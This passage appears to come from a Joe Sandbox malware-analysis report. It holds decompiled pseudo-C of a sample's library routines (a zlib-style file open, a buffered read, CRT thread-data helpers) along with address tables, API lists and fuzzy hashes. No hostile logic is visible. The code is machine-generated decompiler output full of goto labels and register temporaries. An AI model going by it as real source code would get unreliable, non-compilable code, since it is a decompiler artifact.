                                                                        											 *_t89 = _t64;
                                                                        											_t87 = _t89 + 1;
                                                                        											__eflags = _t87;
                                                                        											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                                                                        										} else {
                                                                        											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                                                                        										}
                                                                        									} else {
                                                                        										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                                                                        									}
                                                                        								} else {
                                                                        									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                                                                        								}
                                                                        							} else {
                                                                        								_t98 = _t64 - 0x30;
                                                                        							}
                                                                        							_t91 = _t91 + 1;
                                                                        							if(_t64 == 0) {
                                                                        								goto L26;
                                                                        							}
                                                                        							_t87 = _t103 + 0x68;
                                                                        							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                                                                        								goto L9;
                                                                        							}
                                                                        							L26:
                                                                        							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                                                                        							if(_t65 == 0) {
                                                                        								goto L30;
                                                                        							} else {
                                                                        								if(_t65 != 0x77) {
                                                                        									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                        									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                                                                        									 *_t93 = _t66;
                                                                        									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
                                                                        									_t104 = _t103 + 0x14;
                                                                        									__eflags = _t67;
                                                                        									if(_t67 != 0) {
                                                                        										goto L30;
                                                                        									} else {
                                                                        										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                                                                        										if(__eflags == 0) {
                                                                        											goto L30;
                                                                        										} else {
                                                                        											goto L34;
                                                                        										}
                                                                        									}
                                                                        								} else {
                                                                        									_push(0x38);
                                                                        									_push("1.2.3");
                                                                        									_push( *((intOrPtr*)(_t103 + 0x10)));
                                                                        									_push(8);
                                                                        									_push(0xfffffff1);
                                                                        									_push(8);
                                                                        									_push(_t98);
                                                                        									_push(_t93);
                                                                        									_t91 = E00404CE0();
                                                                        									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                        									_t104 = _t103 + 0x24;
                                                                        									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                                                                        									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                                                                        									if(_t91 != 0 || _t79 == 0) {
                                                                        										goto L30;
                                                                        									} else {
                                                                        										L34:
                                                                        										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                                                                        										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                                                                        										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                                                                        										__eflags = _t69;
                                                                        										_push(_t104 + 0x18);
                                                                        										if(__eflags >= 0) {
                                                                        											_push(_t69);
                                                                        											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
                                                                        										} else {
                                                                        											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                                                                        											_push( *((intOrPtr*)(_t104 + 0x70)));
                                                                        											_t70 = E0040CB9D();
                                                                        										}
                                                                        										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                                                                        										__eflags = _t70;
                                                                        										if(_t70 == 0) {
                                                                        											goto L30;
                                                                        										} else {
                                                                        											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                                        											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                                        												E00405000(_t93, 0);
                                                                        												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                                        												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                                        												__eflags = _t74;
                                                                        												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                                        												return _t93;
                                                                        											} else {
                                                                        												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                                        												return _t93;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							goto L42;
                                                                        							L7:
                                                                        							_t62 =  *_t83;
                                                                        							 *_t88 = _t62;
                                                                        							_t83 = _t83 + 1;
                                                                        							_t88 = _t88 + 1;
                                                                        							if(_t62 != 0) {
                                                                        								goto L7;
                                                                        							} else {
                                                                        								 *((char*)(_t93 + 0x5c)) = 0;
                                                                        							}
                                                                        							goto L9;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				L42:
                                                                        			}

































                                                                        0x004057b7
                                                                        0x004057bf
                                                                        0x004057c3
                                                                        0x004057c5
                                                                        0x004057cd
                                                                        0x004059c8
                                                                        0x004059ce
                                                                        0x004057db
                                                                        0x004057e3
                                                                        0x004057e5
                                                                        0x004057ea
                                                                        0x00405921
                                                                        0x0040592a
                                                                        0x004057f0
                                                                        0x004057f3
                                                                        0x004057f6
                                                                        0x004057f9
                                                                        0x004057fc
                                                                        0x004057ff
                                                                        0x00405801
                                                                        0x00405804
                                                                        0x00405807
                                                                        0x0040580a
                                                                        0x0040580d
                                                                        0x00405810
                                                                        0x00405813
                                                                        0x00405816
                                                                        0x00405819
                                                                        0x0040581c
                                                                        0x00405824
                                                                        0x00405827
                                                                        0x0040582b
                                                                        0x0040582e
                                                                        0x00405831
                                                                        0x00405834
                                                                        0x00405837
                                                                        0x00405837
                                                                        0x00405839
                                                                        0x0040583a
                                                                        0x00405842
                                                                        0x00405847
                                                                        0x0040584a
                                                                        0x0040584f
                                                                        0x0040591c
                                                                        0x0040591c
                                                                        0x00000000
                                                                        0x00405855
                                                                        0x00405855
                                                                        0x00405859
                                                                        0x0040585b
                                                                        0x00000000
                                                                        0x00405870
                                                                        0x00405872
                                                                        0x00405874
                                                                        0x00405874
                                                                        0x00405877
                                                                        0x0040587b
                                                                        0x00405881
                                                                        0x00405881
                                                                        0x00405885
                                                                        0x00405889
                                                                        0x00405897
                                                                        0x00405899
                                                                        0x004058a5
                                                                        0x004058a7
                                                                        0x004058b3
                                                                        0x004058b5
                                                                        0x004058c1
                                                                        0x004058c5
                                                                        0x004058c7
                                                                        0x004058c7
                                                                        0x004058c8
                                                                        0x004058b7
                                                                        0x004058b7
                                                                        0x004058b7
                                                                        0x004058a9
                                                                        0x004058a9
                                                                        0x004058a9
                                                                        0x0040589b
                                                                        0x0040589b
                                                                        0x0040589b
                                                                        0x0040588f
                                                                        0x00405892
                                                                        0x00405892
                                                                        0x004058cc
                                                                        0x004058cf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004058d1
                                                                        0x004058d9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004058db
                                                                        0x004058db
                                                                        0x004058e0
                                                                        0x00000000
                                                                        0x004058e2
                                                                        0x004058e4
                                                                        0x00405930
                                                                        0x0040593f
                                                                        0x00405942
                                                                        0x00405944
                                                                        0x00405949
                                                                        0x0040594c
                                                                        0x0040594e
                                                                        0x00000000
                                                                        0x00405950
                                                                        0x00405950
                                                                        0x00405953
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405953
                                                                        0x004058e6
                                                                        0x004058ea
                                                                        0x004058ec
                                                                        0x004058f1
                                                                        0x004058f2
                                                                        0x004058f4
                                                                        0x004058f6
                                                                        0x004058f8
                                                                        0x004058f9
                                                                        0x00405904
                                                                        0x00405906
                                                                        0x0040590b
                                                                        0x0040590e
                                                                        0x00405911
                                                                        0x00405916
                                                                        0x00000000
                                                                        0x00405955
                                                                        0x00405955
                                                                        0x00405955
                                                                        0x00405961
                                                                        0x00405963
                                                                        0x00405967
                                                                        0x0040596d
                                                                        0x0040596e
                                                                        0x0040597c
                                                                        0x0040597d
                                                                        0x00405970
                                                                        0x00405970
                                                                        0x00405974
                                                                        0x00405975
                                                                        0x00405975
                                                                        0x00405985
                                                                        0x00405988
                                                                        0x0040598a
                                                                        0x00000000
                                                                        0x0040598c
                                                                        0x0040598c
                                                                        0x00405990
                                                                        0x004059a5
                                                                        0x004059ad
                                                                        0x004059b6
                                                                        0x004059b6
                                                                        0x004059b9
                                                                        0x004059c5
                                                                        0x00405992
                                                                        0x00405992
                                                                        0x004059a2
                                                                        0x004059a2
                                                                        0x00405990
                                                                        0x0040598a
                                                                        0x00405916
                                                                        0x004058e4
                                                                        0x00000000
                                                                        0x00405860
                                                                        0x00405860
                                                                        0x00405862
                                                                        0x00405864
                                                                        0x00405865
                                                                        0x00405868
                                                                        0x00000000
                                                                        0x0040586a
                                                                        0x0040586a
                                                                        0x0040586d
                                                                        0x00000000
                                                                        0x00405868
                                                                        0x0040584f
                                                                        0x004057ea
                                                                        0x00000000

                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 004057DE
                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                        • _malloc.LIBCMT ref: 00405842
                                                                        • _malloc.LIBCMT ref: 00405906
                                                                        • _malloc.LIBCMT ref: 00405930
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _malloc$AllocateHeap
                                                                        • String ID: 1.2.3
                                                                        • API String ID: 680241177-2310465506
                                                                        • Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                                        • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                        • Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                                        • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                        				signed int _v8;
                                                                        				char* _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				signed int _t90;
                                                                        				intOrPtr* _t92;
                                                                        				signed int _t94;
                                                                        				char _t97;
                                                                        				signed int _t105;
                                                                        				void* _t106;
                                                                        				signed int _t107;
                                                                        				signed int _t110;
                                                                        				signed int _t113;
                                                                        				intOrPtr* _t114;
                                                                        				signed int _t118;
                                                                        				signed int _t119;
                                                                        				signed int _t120;
                                                                        				char* _t121;
                                                                        				signed int _t125;
                                                                        				signed int _t131;
                                                                        				signed int _t133;
                                                                        				void* _t134;
                                                                        
                                                                        				_t125 = __edx;
                                                                        				_t121 = _a4;
                                                                        				_t119 = _a8;
                                                                        				_t131 = 0;
                                                                        				_v12 = _t121;
                                                                        				_v8 = _t119;
                                                                        				if(_a12 == 0 || _a16 == 0) {
                                                                        					L5:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t138 = _t121;
                                                                        					if(_t121 != 0) {
                                                                        						_t133 = _a20;
                                                                        						__eflags = _t133;
                                                                        						if(_t133 == 0) {
                                                                        							L9:
                                                                        							__eflags = _t119 - 0xffffffff;
                                                                        							if(_t119 != 0xffffffff) {
                                                                        								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
                                                                        								_t134 = _t134 + 0xc;
                                                                        							}
                                                                        							__eflags = _t133 - _t131;
                                                                        							if(__eflags == 0) {
                                                                        								goto L3;
                                                                        							} else {
                                                                        								_t94 = _t90 | 0xffffffff;
                                                                        								_t125 = _t94 % _a12;
                                                                        								__eflags = _a16 - _t94 / _a12;
                                                                        								if(__eflags > 0) {
                                                                        									goto L3;
                                                                        								}
                                                                        								L13:
                                                                        								_t131 = _a12 * _a16;
                                                                        								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                        								_v20 = _t131;
                                                                        								_t120 = _t131;
                                                                        								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                        									_v16 = 0x1000;
                                                                        								} else {
                                                                        									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                        								}
                                                                        								__eflags = _t131;
                                                                        								if(_t131 == 0) {
                                                                        									L40:
                                                                        									return _a16;
                                                                        								} else {
                                                                        									do {
                                                                        										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                        										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                        											L24:
                                                                        											__eflags = _t120 - _v16;
                                                                        											if(_t120 < _v16) {
                                                                        												_t97 = E0040FC07(_t120, _t125, _t133);
                                                                        												__eflags = _t97 - 0xffffffff;
                                                                        												if(_t97 == 0xffffffff) {
                                                                        													L48:
                                                                        													return (_t131 - _t120) / _a12;
                                                                        												}
                                                                        												__eflags = _v8;
                                                                        												if(_v8 == 0) {
                                                                        													L44:
                                                                        													__eflags = _a8 - 0xffffffff;
                                                                        													if(__eflags != 0) {
                                                                        														E0040BA30(_t131, _a4, 0, _a8);
                                                                        														_t134 = _t134 + 0xc;
                                                                        													}
                                                                        													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
                                                                        													_push(0);
                                                                        													_push(0);
                                                                        													_push(0);
                                                                        													_push(0);
                                                                        													_push(0);
                                                                        													L4:
                                                                        													E0040E744(_t125, _t131, _t133);
                                                                        													goto L5;
                                                                        												}
                                                                        												_t123 = _v12;
                                                                        												_v12 = _v12 + 1;
                                                                        												 *_v12 = _t97;
                                                                        												_t120 = _t120 - 1;
                                                                        												_t70 =  &_v8;
                                                                        												 *_t70 = _v8 - 1;
                                                                        												__eflags =  *_t70;
                                                                        												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                        												goto L39;
                                                                        											}
                                                                        											__eflags = _v16;
                                                                        											if(_v16 == 0) {
                                                                        												_t105 = 0x7fffffff;
                                                                        												__eflags = _t120 - 0x7fffffff;
                                                                        												if(_t120 <= 0x7fffffff) {
                                                                        													_t105 = _t120;
                                                                        												}
                                                                        											} else {
                                                                        												__eflags = _t120 - 0x7fffffff;
                                                                        												if(_t120 <= 0x7fffffff) {
                                                                        													_t55 = _t120 % _v16;
                                                                        													__eflags = _t55;
                                                                        													_t125 = _t55;
                                                                        													_t110 = _t120;
                                                                        												} else {
                                                                        													_t125 = 0x7fffffff % _v16;
                                                                        													_t110 = 0x7fffffff;
                                                                        												}
                                                                        												_t105 = _t110 - _t125;
                                                                        											}
                                                                        											__eflags = _t105 - _v8;
                                                                        											if(_t105 > _v8) {
                                                                        												goto L44;
                                                                        											} else {
                                                                        												_push(_t105);
                                                                        												_push(_v12);
                                                                        												_t106 = E0040FA20(_t125, _t131, _t133);
                                                                        												_pop(_t123);
                                                                        												_push(_t106);
                                                                        												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                                                                        												_t134 = _t134 + 0xc;
                                                                        												__eflags = _t107;
                                                                        												if(_t107 == 0) {
                                                                        													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                                        													goto L48;
                                                                        												}
                                                                        												__eflags = _t107 - 0xffffffff;
                                                                        												if(_t107 == 0xffffffff) {
                                                                        													L47:
                                                                        													_t80 = _t133 + 0xc;
                                                                        													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                                        													__eflags =  *_t80;
                                                                        													goto L48;
                                                                        												}
                                                                        												_v12 = _v12 + _t107;
                                                                        												_t120 = _t120 - _t107;
                                                                        												_v8 = _v8 - _t107;
                                                                        												goto L39;
                                                                        											}
                                                                        										}
                                                                        										_t113 =  *(_t133 + 4);
                                                                        										__eflags = _t113;
                                                                        										if(__eflags == 0) {
                                                                        											goto L24;
                                                                        										}
                                                                        										if(__eflags < 0) {
                                                                        											goto L47;
                                                                        										}
                                                                        										_t131 = _t120;
                                                                        										__eflags = _t120 - _t113;
                                                                        										if(_t120 >= _t113) {
                                                                        											_t131 = _t113;
                                                                        										}
                                                                        										__eflags = _t131 - _v8;
                                                                        										if(_t131 > _v8) {
                                                                        											_t133 = 0;
                                                                        											__eflags = _a8 - 0xffffffff;
                                                                        											if(__eflags != 0) {
                                                                        												E0040BA30(_t131, _a4, 0, _a8);
                                                                        												_t134 = _t134 + 0xc;
                                                                        											}
                                                                        											_t114 = E0040BFC1(__eflags);
                                                                        											_push(_t133);
                                                                        											_push(_t133);
                                                                        											_push(_t133);
                                                                        											_push(_t133);
                                                                        											 *_t114 = 0x22;
                                                                        											_push(_t133);
                                                                        											goto L4;
                                                                        										} else {
                                                                        											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                                        											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                                        											 *_t133 =  *_t133 + _t131;
                                                                        											_v12 = _v12 + _t131;
                                                                        											_t120 = _t120 - _t131;
                                                                        											_t134 = _t134 + 0x10;
                                                                        											_v8 = _v8 - _t131;
                                                                        											_t131 = _v20;
                                                                        										}
                                                                        										L39:
                                                                        										__eflags = _t120;
                                                                        									} while (_t120 != 0);
                                                                        									goto L40;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_t118 = _t90 | 0xffffffff;
                                                                        						_t90 = _t118 / _a12;
                                                                        						_t125 = _t118 % _a12;
                                                                        						__eflags = _a16 - _t90;
                                                                        						if(_a16 <= _t90) {
                                                                        							goto L13;
                                                                        						}
                                                                        						goto L9;
                                                                        					}
                                                                        					L3:
                                                                        					_t92 = E0040BFC1(_t138);
                                                                        					_push(_t131);
                                                                        					_push(_t131);
                                                                        					_push(_t131);
                                                                        					_push(_t131);
                                                                        					 *_t92 = 0x16;
                                                                        					_push(_t131);
                                                                        					goto L4;
                                                                        				}
                                                                        			}





























                                                                        0x0040bcc2
                                                                        0x0040bcca
                                                                        0x0040bcce
                                                                        0x0040bcd3
                                                                        0x0040bcd5
                                                                        0x0040bcd8
                                                                        0x0040bcde
                                                                        0x0040bd01
                                                                        0x00000000
                                                                        0x0040bce5
                                                                        0x0040bce5
                                                                        0x0040bce7
                                                                        0x0040bd08
                                                                        0x0040bd0b
                                                                        0x0040bd0d
                                                                        0x0040bd1c
                                                                        0x0040bd1c
                                                                        0x0040bd1f
                                                                        0x0040bd24
                                                                        0x0040bd29
                                                                        0x0040bd29
                                                                        0x0040bd2c
                                                                        0x0040bd2e
                                                                        0x00000000
                                                                        0x0040bd30
                                                                        0x0040bd30
                                                                        0x0040bd35
                                                                        0x0040bd38
                                                                        0x0040bd3b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040bd3d
                                                                        0x0040bd40
                                                                        0x0040bd44
                                                                        0x0040bd4b
                                                                        0x0040bd4e
                                                                        0x0040bd50
                                                                        0x0040bd5a
                                                                        0x0040bd52
                                                                        0x0040bd55
                                                                        0x0040bd55
                                                                        0x0040bd61
                                                                        0x0040bd63
                                                                        0x0040be53
                                                                        0x00000000
                                                                        0x0040bd69
                                                                        0x0040bd69
                                                                        0x0040bd69
                                                                        0x0040bd70
                                                                        0x0040bdb6
                                                                        0x0040bdb6
                                                                        0x0040bdb9
                                                                        0x0040be24
                                                                        0x0040be2a
                                                                        0x0040be2d
                                                                        0x0040beb8
                                                                        0x00000000
                                                                        0x0040bebe
                                                                        0x0040be33
                                                                        0x0040be37
                                                                        0x0040be87
                                                                        0x0040be87
                                                                        0x0040be8b
                                                                        0x0040be95
                                                                        0x0040be9a
                                                                        0x0040be9a
                                                                        0x0040bea2
                                                                        0x0040beaa
                                                                        0x0040beab
                                                                        0x0040beac
                                                                        0x0040bead
                                                                        0x0040beae
                                                                        0x0040bcf9
                                                                        0x0040bcf9
                                                                        0x00000000
                                                                        0x0040bcfe
                                                                        0x0040be39
                                                                        0x0040be3c
                                                                        0x0040be3f
                                                                        0x0040be44
                                                                        0x0040be45
                                                                        0x0040be45
                                                                        0x0040be45
                                                                        0x0040be48
                                                                        0x00000000
                                                                        0x0040be48
                                                                        0x0040bdbb
                                                                        0x0040bdbf
                                                                        0x0040bde0
                                                                        0x0040bde5
                                                                        0x0040bde7
                                                                        0x0040bde9
                                                                        0x0040bde9
                                                                        0x0040bdc1
                                                                        0x0040bdc8
                                                                        0x0040bdca
                                                                        0x0040bdd7
                                                                        0x0040bdd7
                                                                        0x0040bdd7
                                                                        0x0040bdda
                                                                        0x0040bdcc
                                                                        0x0040bdce
                                                                        0x0040bdd1
                                                                        0x0040bdd1
                                                                        0x0040bddc
                                                                        0x0040bddc
                                                                        0x0040bdeb
                                                                        0x0040bdee
                                                                        0x00000000
                                                                        0x0040bdf4
                                                                        0x0040bdf4
                                                                        0x0040bdf5
                                                                        0x0040bdf9
                                                                        0x0040bdfe
                                                                        0x0040bdff
                                                                        0x0040be00
                                                                        0x0040be05
                                                                        0x0040be08
                                                                        0x0040be0a
                                                                        0x0040bec6
                                                                        0x00000000
                                                                        0x0040bec6
                                                                        0x0040be10
                                                                        0x0040be13
                                                                        0x0040beb4
                                                                        0x0040beb4
                                                                        0x0040beb4
                                                                        0x0040beb4
                                                                        0x00000000
                                                                        0x0040beb4
                                                                        0x0040be19
                                                                        0x0040be1c
                                                                        0x0040be1e
                                                                        0x00000000
                                                                        0x0040be1e
                                                                        0x0040bdee
                                                                        0x0040bd72
                                                                        0x0040bd75
                                                                        0x0040bd77
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040bd79
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040bd7f
                                                                        0x0040bd81
                                                                        0x0040bd83
                                                                        0x0040bd85
                                                                        0x0040bd85
                                                                        0x0040bd87
                                                                        0x0040bd8a
                                                                        0x0040be5b
                                                                        0x0040be5d
                                                                        0x0040be61
                                                                        0x0040be6a
                                                                        0x0040be6f
                                                                        0x0040be6f
                                                                        0x0040be72
                                                                        0x0040be77
                                                                        0x0040be78
                                                                        0x0040be79
                                                                        0x0040be7a
                                                                        0x0040be7b
                                                                        0x0040be81
                                                                        0x00000000
                                                                        0x0040bd90
                                                                        0x0040bd99
                                                                        0x0040bd9e
                                                                        0x0040bda1
                                                                        0x0040bda3
                                                                        0x0040bda6
                                                                        0x0040bda8
                                                                        0x0040bdab
                                                                        0x0040bdae
                                                                        0x0040bdae
                                                                        0x0040be4b
                                                                        0x0040be4b
                                                                        0x0040be4b
                                                                        0x00000000
                                                                        0x0040bd69
                                                                        0x0040bd63
                                                                        0x0040bd2e
                                                                        0x0040bd0f
                                                                        0x0040bd14
                                                                        0x0040bd14
                                                                        0x0040bd17
                                                                        0x0040bd1a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040bd1a
                                                                        0x0040bce9
                                                                        0x0040bce9
                                                                        0x0040bcee
                                                                        0x0040bcef
                                                                        0x0040bcf0
                                                                        0x0040bcf1
                                                                        0x0040bcf2
                                                                        0x0040bcf8
                                                                        0x00000000
                                                                        0x0040bcf8

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                        • String ID:
                                                                        • API String ID: 3886058894-0
                                                                        • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                        • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                        • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                        • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                        				signed int _t13;
                                                                        				intOrPtr _t28;
                                                                        				void* _t29;
                                                                        				void* _t30;
                                                                        
                                                                        				_t30 = __eflags;
                                                                        				_t26 = __edi;
                                                                        				_t25 = __edx;
                                                                        				_t22 = __ebx;
                                                                        				_push(0xc);
                                                                        				_push(0x4214d0);
                                                                        				E0040E1D8(__ebx, __edi, __esi);
                                                                        				_t28 = E00410735(__ebx, __edx, __edi, _t30);
                                                                        				_t13 =  *0x422e34; // 0xfffffffe
                                                                        				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                        					L6:
                                                                        					E0040D6E0(_t22, 0xc);
                                                                        					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                        					_t8 = _t28 + 0x6c; // 0x6c
                                                                        					_t26 =  *0x422f18; // 0x422e40
                                                                        					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
                                                                        					 *(_t29 - 4) = 0xfffffffe;
                                                                        					E004147A2();
                                                                        				} else {
                                                                        					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                        					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                        						goto L6;
                                                                        					} else {
                                                                        						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
                                                                        					}
                                                                        				}
                                                                        				if(_t28 == 0) {
                                                                        					E0040E79A(_t25, _t26, 0x20);
                                                                        				}
                                                                        				return E0040E21D(_t28);
                                                                        			}







                                                                        0x00414738
                                                                        0x00414738
                                                                        0x00414738
                                                                        0x00414738
                                                                        0x00414738
                                                                        0x0041473a
                                                                        0x0041473f
                                                                        0x00414749
                                                                        0x0041474b
                                                                        0x00414753
                                                                        0x00414777
                                                                        0x00414779
                                                                        0x0041477f
                                                                        0x00414783
                                                                        0x00414786
                                                                        0x00414791
                                                                        0x00414794
                                                                        0x0041479b
                                                                        0x00414755
                                                                        0x00414755
                                                                        0x00414759
                                                                        0x00000000
                                                                        0x0041475b
                                                                        0x00414760
                                                                        0x00414760
                                                                        0x00414759
                                                                        0x00414765
                                                                        0x00414769
                                                                        0x0041476e
                                                                        0x00414776

                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 00414744
                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                        • __getptd.LIBCMT ref: 0041475B
                                                                        • __amsg_exit.LIBCMT ref: 00414769
                                                                        • __lock.LIBCMT ref: 00414779
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                        • String ID: @.B
                                                                        • API String ID: 3521780317-470711618
                                                                        • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                        • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                        • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                        • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				void* _t16;
                                                                        				void* _t17;
                                                                        				intOrPtr _t19;
                                                                        				void* _t21;
                                                                        				signed int _t22;
                                                                        				intOrPtr* _t27;
                                                                        				intOrPtr _t39;
                                                                        				intOrPtr _t40;
                                                                        				intOrPtr _t50;
                                                                        
                                                                        				_t37 = __edx;
                                                                        				_push(8);
                                                                        				_push(0x421140);
                                                                        				E0040E1D8(__ebx, __edi, __esi);
                                                                        				_t39 = _a4;
                                                                        				_t50 = _t39;
                                                                        				_t51 = _t50 != 0;
                                                                        				if(_t50 != 0) {
                                                                        					E0040FB29(_t39);
                                                                        					_v8 = 0;
                                                                        					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                                                                        					_t16 = E0040FA20(__edx, _t39, _t39);
                                                                        					__eflags = _t16 - 0xffffffff;
                                                                        					if(_t16 == 0xffffffff) {
                                                                        						L6:
                                                                        						_t17 = 0x4227e0;
                                                                        					} else {
                                                                        						_t21 = E0040FA20(__edx, _t39, _t39);
